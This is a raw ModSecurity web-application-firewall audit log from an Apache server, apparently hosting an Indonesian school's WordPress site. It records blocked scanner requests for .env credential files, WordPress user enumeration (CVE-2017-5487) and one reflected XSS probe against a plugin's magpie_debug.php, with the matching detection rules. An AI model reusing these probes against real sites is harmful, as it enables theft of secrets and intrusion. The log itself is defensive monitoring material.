Content-Type: text/html; charset=iso-8859-1 --d33f7e17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748756555215296 3600 (- - -) Stopwatch2: 1748756555215296 3600; combined=1538, p1=491, p2=1010, p3=0, p4=0, p5=37, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d33f7e17-Z-- --a737a06e-A-- [01/Jun/2025:12:58:39 +0700] aDvsDwQ4kZQGAOBHoB5jfwAAAME 103.236.140.4 35012 103.236.140.4 8181 --a737a06e-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 165.227.84.14 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 165.227.84.14 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a737a06e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a737a06e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748757519661850 794 (- - -) Stopwatch2: 1748757519661850 794; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a737a06e-Z-- --fc95eb78-A-- [01/Jun/2025:13:54:25 +0700] aDv5Ie4LjVe0Eerk_ZausgAAAFM 103.236.140.4 51442 103.236.140.4 8181 --fc95eb78-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.205.64.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.205.64.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fc95eb78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc95eb78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748760865423651 3391 (- - -) Stopwatch2: 1748760865423651 3391; combined=1563, p1=536, p2=994, p3=0, p4=0, p5=32, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc95eb78-Z-- --36c23358-A-- [01/Jun/2025:14:10:07 +0700] aDv8zwQ4kZQGAOBHoB5zeAAAAME 103.236.140.4 51604 103.236.140.4 8181 --36c23358-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 164.92.107.174 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 164.92.107.174 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --36c23358-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36c23358-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748761807418891 824 (- - -) Stopwatch2: 1748761807418891 824; combined=340, p1=307, p2=0, p3=0, p4=0, p5=32, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36c23358-Z-- --c3d99b41-A-- [01/Jun/2025:14:10:35 +0700] aDv86wQ4kZQGAOBHoB5zfgAAANg 103.236.140.4 51618 103.236.140.4 8181 --c3d99b41-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.250.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.250.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c3d99b41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3d99b41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748761835178356 3154 (- - -) Stopwatch2: 1748761835178356 3154; combined=1356, p1=463, p2=863, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3d99b41-Z-- --d4f41252-A-- [01/Jun/2025:14:25:30 +0700] aDwAagQHT18O7PnXxsQySgAAAJU 103.236.140.4 51860 103.236.140.4 8181 --d4f41252-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.189.19.19 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --d4f41252-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4f41252-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748762730184960 919 (- - -) Stopwatch2: 1748762730184960 919; combined=358, p1=319, p2=0, p3=0, p4=0, p5=38, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4f41252-Z-- --7325b97b-A-- [01/Jun/2025:14:46:18 +0700] aDwFSgQ4kZQGAOBHoB5zkwAAAMQ 103.236.140.4 51990 103.236.140.4 8181 --7325b97b-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 206.81.12.187 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --7325b97b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7325b97b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748763978294845 791 (- - -) Stopwatch2: 1748763978294845 791; combined=302, p1=270, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7325b97b-Z-- --dae30511-A-- [01/Jun/2025:15:01:16 +0700] aDwIzAQ4kZQGAOBHoB5zmgAAAMA 103.236.140.4 52088 103.236.140.4 8181 --dae30511-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.49.156.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.49.156.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dae30511-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dae30511-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748764876481644 3345 (- - -) Stopwatch2: 1748764876481644 3345; combined=1385, p1=461, p2=895, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dae30511-Z-- --2a91d928-A-- [01/Jun/2025:15:06:10 +0700] aDwJ8gQ4kZQGAOBHoB5zoQAAAMs 103.236.140.4 52142 103.236.140.4 8181 --2a91d928-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.37.243.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.37.243.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2a91d928-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a91d928-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748765170645631 3513 (- - -) Stopwatch2: 1748765170645631 3513; combined=1556, p1=592, p2=919, p3=0, p4=0, p5=45, sr=181, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a91d928-Z-- --7a7afe23-A-- [01/Jun/2025:15:06:43 +0700] aDwKEwQ4kZQGAOBHoB5zowAAANU 103.236.140.4 52146 103.236.140.4 8181 --7a7afe23-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.101.134.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.101.134.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7a7afe23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a7afe23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748765203515255 3148 (- - -) Stopwatch2: 1748765203515255 3148; combined=1355, p1=461, p2=863, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a7afe23-Z-- --cf33b54a-A-- [01/Jun/2025:15:12:37 +0700] aDwLdUaTRmdfB-FaJjngzQAAAAM 103.236.140.4 52164 103.236.140.4 8181 --cf33b54a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.33.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.33.210 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --cf33b54a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf33b54a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748765557922698 867 (- - -) Stopwatch2: 1748765557922698 867; combined=387, p1=285, p2=0, p3=0, p4=0, p5=102, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf33b54a-Z-- --204b9a67-A-- [01/Jun/2025:15:12:56 +0700] aDwLiAQ4kZQGAOBHoB5zpwAAANE 103.236.140.4 52168 103.236.140.4 8181 --204b9a67-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.30.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.30.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --204b9a67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --204b9a67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748765576381857 3388 (- - -) Stopwatch2: 1748765576381857 3388; combined=1434, p1=495, p2=910, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --204b9a67-Z-- --6a8a5827-A-- [01/Jun/2025:15:25:14 +0700] aDwOagQ4kZQGAOBHoB50IwAAANY 103.236.140.4 52632 103.236.140.4 8181 --6a8a5827-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --6a8a5827-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a8a5827-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766314029088 818 (- - -) Stopwatch2: 1748766314029088 818; combined=353, p1=316, p2=0, p3=0, p4=0, p5=37, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a8a5827-Z-- --770f3471-A-- [01/Jun/2025:15:25:15 +0700] aDwOawQ4kZQGAOBHoB50JAAAANc 103.236.140.4 52634 103.236.140.4 8181 --770f3471-B-- POST /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.2 X-Forwarded-Proto: https Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* Content-Type: application/x-www-form-urlencoded --770f3471-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --770f3471-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766315463918 668 (- - -) Stopwatch2: 1748766315463918 668; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --770f3471-Z-- --a14e355b-A-- [01/Jun/2025:15:25:16 +0700] aDwObO4LjVe0Eerk_Zau5wAAAFA 103.236.140.4 52640 103.236.140.4 8181 --a14e355b-B-- GET /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* --a14e355b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a14e355b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766316665183 663 (- - -) Stopwatch2: 1748766316665183 663; combined=261, p1=230, p2=0, p3=0, p4=0, p5=31, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a14e355b-Z-- --366bff16-A-- [01/Jun/2025:15:25:18 +0700] aDwObgQHT18O7PnXxsQyagAAAIk 103.236.140.4 52644 103.236.140.4 8181 --366bff16-B-- POST /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.2 X-Forwarded-Proto: https Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --366bff16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --366bff16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766318187995 803 (- - -) Stopwatch2: 1748766318187995 803; combined=341, p1=300, p2=0, p3=0, p4=0, p5=41, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --366bff16-Z-- --62566d51-A-- [01/Jun/2025:15:25:19 +0700] aDwObwQ4kZQGAOBHoB50KQAAAMI 103.236.140.4 52648 103.236.140.4 8181 --62566d51-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --62566d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62566d51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766319649074 793 (- - -) Stopwatch2: 1748766319649074 793; combined=340, p1=301, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62566d51-Z-- --f1539779-A-- [01/Jun/2025:15:25:21 +0700] aDwOce4LjVe0Eerk_Zau6AAAAFI 103.236.140.4 52654 103.236.140.4 8181 --f1539779-B-- POST /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.177.72.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.177.72.2 X-Forwarded-Proto: https Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --f1539779-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1539779-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766321109079 842 (- - -) Stopwatch2: 1748766321109079 842; combined=362, p1=325, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1539779-Z-- --0f7ba729-A-- [01/Jun/2025:15:27:52 +0700] aDwPCO4LjVe0Eerk_Zau6QAAAFU 103.236.140.4 52740 103.236.140.4 8181 --0f7ba729-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (compatible; archive.org_bot; Wayback Machine Live Record; +http://archive.org/details/archive.org_bot) Accept-Charset: utf-8 --0f7ba729-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f7ba729-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748766472553528 878 (- - -) Stopwatch2: 1748766472553528 878; combined=380, p1=342, p2=0, p3=0, p4=0, p5=38, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f7ba729-Z-- --c3d1a752-A-- [01/Jun/2025:15:42:47 +0700] aDwShwQHT18O7PnXxsQyewAAAJM 103.236.140.4 52862 103.236.140.4 8181 --c3d1a752-B-- GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/104.0 Safari/537.36 